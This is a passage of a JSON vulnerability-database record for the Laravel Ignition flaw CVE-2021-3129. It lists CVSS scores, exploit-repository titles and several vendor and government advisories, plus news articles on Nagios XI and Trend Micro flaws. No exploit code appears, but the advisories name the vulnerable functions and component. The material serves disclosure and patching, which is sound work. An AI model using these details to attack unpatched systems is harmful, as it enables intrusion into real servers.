"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-03T15:25:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-09-04T15:39:25", "id": "3D2EB075-50D1-5A54-ADA0-1A3BF6A0CC42", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:02:45", "description": "# laravel-CVE-2021-3129-EXP\n\nCVE-2021-312...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:35:04", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-03-01T08:06:10", "id": "B4031542-31ED-5A0E-934F-8523687B36BF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-21T10:03:56", "description": "# Laravel Debug mode RCE\u6f0f\u6d1e\uff08CVE-2021-3129\uff09poc / exp\n> CVE-2021-31...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-04T17:04:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-09-21T09:17:18", "id": "85CC8F81-2E10-5C33-80A8-0F7EA5C645F0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-28T12:00:03", "description": "# CVE-2021-3129 - Laravel RCE\n\n## About\nThe script has been made...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-16T17:22:55", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-09-28T11:38:01", "id": "35896337-DA85-5D42-B9FC-4DF2E3EC881E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:30:25", "description": "## Introduction\nThe application is used for tracking people acco...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-22T14:27:29", "type": "githubexploit", "title": "Exploit for Improper Authentication in Th-Wildau Covid-19 Contact Tracing", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33840", "CVE-2021-33831", "CVE-2021-3129"], "modified": "2021-09-01T08:02:36", "id": "7407E081-4DB0-50D7-AC00-42DC86BACF6D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:48", "description": "A remote code execution vulnerability exists in Laravel Ignition. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-01T00:00:00", "type": "checkpoint_advisories", "title": "Laravel Ignition Remote Code Execution (CVE-2021-3129)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-02-01T00:00:00", "id": "CPAI-2021-0030", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "friendsofphp": [{"lastseen": "2023-05-27T19:32:14", "description": "Hello, as discussed by email, this fixes a serious vulnerability. Hopefully my code is OK-ish. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-17T09:18:00", "type": "friendsofphp", "title": "Remote code execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-02-18T12:38:00", "id": "FRIENDSOFPHP:FACADE", "href": "https://github.com/FriendsOfPHP/security-advisories/tree/master/facade/ignition", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-04-11T01:41:16", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T20:23:46", "type": "osv", "title": "Unauthenticated remote code execution in Ignition", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-04-11T01:41:15", "id": "OSV:GHSA-4QWP-7C67-JMCC", "href": "https://osv.dev/vulnerability/GHSA-4qwp-7c67-jmcc", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-09-20T18:14:14", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at September 18, 2023 9:36pm UTC reported:\n\nAdded to CISA KEV [on Sept. 18, 2023](<https://www.cisa.gov/news-events/alerts/2023/09/18/cisa-adds-eight-known-exploited-vulnerabilities-catalog>), but exploited for at least the past [two years](<https://isc.sans.edu/diary/Laravel+v842+exploit+attempts+for+CVE20213129+debug+mode+Remote+code+execution/27758>). Vuln only affects sites with debug mode enabled, which are evidently more common than one perhaps would\u2019ve thought. In any event, it\u2019s a two-plus-year-old vuln \u2014 please patch it.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-3129", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-01-21T00:00:00", "id": "AKB:5E9429E0-21B2-448F-8137-A7FDE1EA5C48", "href": "https://attackerkb.com/topics/KP6wETuZyw/cve-2021-3129", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-05-27T15:16:02", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T20:23:46", "type": "github", "title": "Unauthenticated remote code execution in Ignition", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-02-01T05:05:19", "id": "GHSA-4QWP-7C67-JMCC", "href": "https://github.com/advisories/GHSA-4qwp-7c67-jmcc", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-09-18T15:51:38", "description": "Laravel Ignition contains a file upload vulnerability that allows unauthenticated remote attackers to execute malicious code due to insecure usage of file_get_contents() and file_put_contents().", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-09-18T00:00:00", "type": "cisa_kev", "title": "Laravel Ignition File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-09-18T00:00:00", "id": "CISA-KEV-CVE-2021-3129", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T06:53:52", "description": "facade/ignition is vulnerable to arbitrary code execution. The vulnerability exists through stream wrappers in files that do not end of `.blade.php` in `MakeViewVariableOptionalSolution`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T02:33:13", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-22T11:30:31", "id": "VERACODE:28976", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-28976/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:16", "description": "[](<https://thehackernews.com/images/-_zK7G9ZRQb8/YUsHcl2SuFI/AAAAAAAAD3Q/_Ls1Q3wSwhc4pVqRiID1YnaQMe4Gc5DJACLcBGAsYHQ/s0/hack.jpg>)\n\nAs many as 11 security vulnerabilities have been disclosed in Nagios network management systems, some of which could be chained to achieve pre-authenticated remote code execution with the highest privileges, as well as lead to credential theft and phishing attacks. \n\nIndustrial cybersecurity firm Claroty, which discovered the flaws, said flaws in tools such as Nagios make them an attractive target owing to their \"oversight of core servers, devices, and other critical components in the enterprise network.\" The issues have since been fixed in updates released in August with Nagios XI 5.8.5 or above, Nagios XI Switch Wizard 2.5.7 or above, Nagios XI Docker Wizard 1.13 or above, and Nagios XI WatchGuard 1.4.8 or above.\n\n\"[SolarWinds](<https://thehackernews.com/2021/01/heres-how-solarwinds-hackers-stayed.html>) and [Kaseya](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) were likely targeted not only because of their large and influential customer bases, but also because of their respective technologies' access to enterprise networks, whether it was managing IT, operational technology (OT), or internet of things (IoT) devices,\" Claroty's Noam Moshe [said](<https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/>) in a write-up published Tuesday, noting how the intrusions targeting the IT and network management supply chains emerged as a conduit to compromise thousands of downstream victims.\n\nNagios Core is a popular open-source network health tool analogous to SolarWinds Network Performance Monitor (NPM) that's used for keeping tabs on IT infrastructure for performance issues and sending alerts following the failure of mission-critical components. Nagios XI, a proprietary web-based platform built atop Nagios Core, provides organizations with extended insight into their IT operations with scalable monitoring and a customizable high-level overview of hosts, services, and network devices.\n\n[](<https://thehackernews.com/images/-GHdYbQOsDiI/YUsESh5WR7I/AAAAAAAAD3A/HnsV6jzMXhg5uYEIoy0ZXxw_wuq5OnMwgCLcBGAsYHQ/s0/exploit.jpg>)\n\nChief among the issues are two remote code execution flaws (CVE-2021-37344, CVE-2021-37346) in Nagios XI Switch Wizard and Nagios XI WatchGuard Wizard, an SQL injection vulnerability (CVE-2021-37350) in Nagios XI, and a server-side request forgery (SSRF) affecting Nagios XI Docker Wizard, as well as a post-authenticated RCE in Nagios XI's AutoDiscovery tool (CVE-2021-37343). The [complete list of 11 flaws](<https://www.nagios.com/products/security/>) is as follows -\n\n * **CVE-2021-37343** (CVSS score: 8.8) - A path traversal vulnerability exists in Nagios XI below version 5.8.5 AutoDiscovery component and could lead to post-authenticated RCE under the security context of the user running Nagios.\n * **CVE-2021-37344** (CVSS score: 9.8) - Nagios XI Switch Wizard before version 2.5.7 is vulnerable to remote code execution through improper neutralization of special elements used in an OS Command (OS Command injection).\n * **CVE-2021-37345** (CVSS score: 7.8) - Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because xi-sys.cfg is being imported from the var directory for some scripts with elevated permissions.\n * **CVE-2021-37346** (CVSS score: 9.8) - Nagios XI WatchGuard Wizard before version 1.4.8 is vulnerable to remote code execution through Improper neutralization of special elements used in an OS Command (OS Command injection).\n * **CVE-2021-37347** (CVSS score: 7.8) - Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because getprofile.sh does not validate the directory name it receives as an argument.\n * **CVE-2021-37348** (CVSS score: 7.5) - Nagios XI before version 5.8.5 is vulnerable to local file inclusion through an improper limitation of a pathname in index.php.\n * **CVE-2021-37349** (CVSS score: 7.8) - Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because cleaner.php does not sanitize input read from the database.\n * **CVE-2021-37350** (CVSS score: 9.8) - Nagios XI before version 5.8.5 is vulnerable to SQL injection vulnerability in Bulk Modifications Tool due to improper input sanitization.\n * **CVE-2021-37351** (CVSS score: 5.3) - Nagios XI before version 5.8.5 is vulnerable to insecure permissions and allows unauthenticated users to access guarded pages through a crafted HTTP request to the server.\n * **CVE-2021-37352** (CVSS score: 6.1) - An open redirect vulnerability exists in Nagios XI before version 5.8.5 that could lead to spoofing. To exploit the vulnerability, an attacker could send a link that has a specially-crafted URL and convince the user to click the link.\n * **CVE-2021-37353** (CVSS score: 9.8) - Nagios XI Docker Wizard before version 1.1.3 is vulnerable to SSRF due to improper sanitization in table_population.php\n\nIn a nutshell, the flaws could be combined by attackers to drop a web shell or execute PHP scripts and elevate their privileges to root, thus achieving arbitrary command execution in the context of the root user. As a proof-of-concept, Claroty chained CVE-2021-37343 and CVE-2021-37347 to gain a write-what-where primitive, allowing an attacker to write content to any file in the system.\n\n[](<https://thehackernews.com/images/-AjAmFEdihE0/YUsEcTnpD0I/AAAAAAAAD3E/Xy9KWzcf5E8BqgUvc_PVK2Bmg2qfmH3JgCLcBGAsYHQ/s0/poc.gif>)\n\n\"[Network management systems] require extensive trust and access to network components in order to properly monitor network behaviors and performance for failures and poor efficiency,\" Moshe said. \n\n\"They may also extend outside your network through the firewall to attend to remote servers and connections. Therefore, these centralized systems can be a tasty target for attackers who can leverage this type of network hub, and attempt to compromise it in order to access, manipulate, and disrupt other systems.\"\n\nThe disclosure is the second time nearly dozen vulnerabilities have been disclosed in Nagios since the start of the year. Earlier this May, Skylight Cyber revealed [13 security weaknesses](<https://thehackernews.com/2021/05/details-disclosed-on-critical-flaws.html>) in the network monitoring application that could be abused by an adversary to hijack the infrastructure without any operator intervention.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T10:38:00", "type": "thn", "title": "New Nagios Software Bugs Could Let Hackers Take Over IT Infrastructures", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37343", "CVE-2021-37344", "CVE-2021-37345", "CVE-2021-37346", "CVE-2021-37347", "CVE-2021-37348", "CVE-2021-37349", "CVE-2021-37350", "CVE-2021-37351", "CVE-2021-37352", "CVE-2021-37353"], "modified": "2021-09-27T04:39:25", "id": "THN:428850EABCB7BBC35D8D2E5FF4E56616", "href": "https://thehackernews.com/2021/09/new-nagios-software-bugs-could-let.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-20T08:36:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjLw4dM_R7jK77JSYEqnIGHj9FpwHZna9q4oDDjTmPycBFRT7G6MFQqz0t4AyOF0Tc9CSK1Q_HQSyjPuZLYaXaDsW7BcX9uV-FFzC53P6haZCU07_dJD2m_M0oWV-COKtxukmQyaLMLZ9_w5rUNIM7X8gVkQZIL3grEooZ78nPi-ROQIJPOsvvMSQXHbzzD/s728-e365/trend.jpg>)\n\nCybersecurity company Trend Micro has [released](<https://success.trendmicro.com/dcx/s/solution/000294994?language=en_US>) patches and hotfixes to address a critical security flaw in Apex One and Worry-Free Business Security solutions for Windows that has been actively exploited in real-world attacks.\n\nTracked as [**CVE-2023-41179**](<https://nvd.nist.gov/vuln/detail/CVE-2023-41179>) (CVSS score: 9.1), it relates to a third-party antivirus uninstaller module that's bundled along with the software. The complete list of impacted products is as follows -\n\n * Apex One - version 2019 (on-premise), fixed in SP1 Patch 1 (B12380)\n * Apex One as a Service - fixed in SP1 Patch 1 (B12380) and Agent version 14.0.12637\n * Worry-Free Business Security - version 10.0 SP1, fixed in 10.0 SP1 Patch 2495\n * Worry-Free Business Security Services - fixed in July 31, 2023, Monthly Maintenance Release\n\nTrend Micro said that a successful exploitation of the flaw could allow an attacker to manipulate the component to execute arbitrary commands on an affected installation. However, it requires that the adversary already has administrative console access on the target system.\n\n[](<https://thn.news/o6a5Vxgy> \"Cybersecurity\" )\n\nThe company also warned that it has \"observed at least one active attempt of potential exploitation of this vulnerability in the wild,\" making it essential that users move quickly to apply the patches.\n\nAs a workaround, it's recommending that customers limit access to the product's administration console to trusted networks.\n\n## CISA Adds Nine Flaws to KEV Catalog\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEih8JCcosfaTXv1jZjOsRK50Wv6SGThzbUhl4VXvIRzb-0yGfGPG90lXzBzeACynqUXqGzZXFZwRbOwuwPA0fnaG26gYcS1YluA5HV_GwwucHzx9uUMf0IyohhkIs-AE0fVyUzhBH3U4ZUQrfSW5Gq5QsUl09ycyfkVS0pEZsOC8mSLF0hp_-QlbUXz_Siv/s728-e365/kev.png>)\n\nThe development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [added](<https://www.cisa.gov/news-events/alerts/2023/09/18/cisa-adds-eight-known-exploited-vulnerabilities-catalog>) [nine flaws](<https://www.cisa.gov/news-events/alerts/2023/09/19/cisa-adds-one-known-exploited-vulnerability-catalog>) to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, citing evidence of active exploitation in the wild -\n\n * [**CVE-2014-8361**](<https://nvd.nist.gov/vuln/detail/CVE-2014-8361>) (CVSS score: N/A) - Realtek SDK Improper Input Validation Vulnerability\n * [**CVE-2017-6884**](<https://nvd.nist.gov/vuln/detail/CVE-2017-6884>) (CVSS score: 8.8) - Zyxel EMG2926 Routers Command Injection Vulnerability\n * [**CVE-2021-3129**](<https://nvd.nist.gov/vuln/detail/CVE-2021-3129>) (CVSS score: 9.8) - Laravel Ignition File Upload Vulnerability\n * [**CVE-2022-22265**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22265>) (CVSS score: 7.8) - Samsung Mobile Devices Use-After-Free Vulnerability\n * [**CVE-2022-31459**](<https://nvd.nist.gov/vuln/detail/CVE-2022-31459>) (CVSS score: 6.5) - Owl Labs Meeting Owl Inadequate Encryption Strength Vulnerability\n * 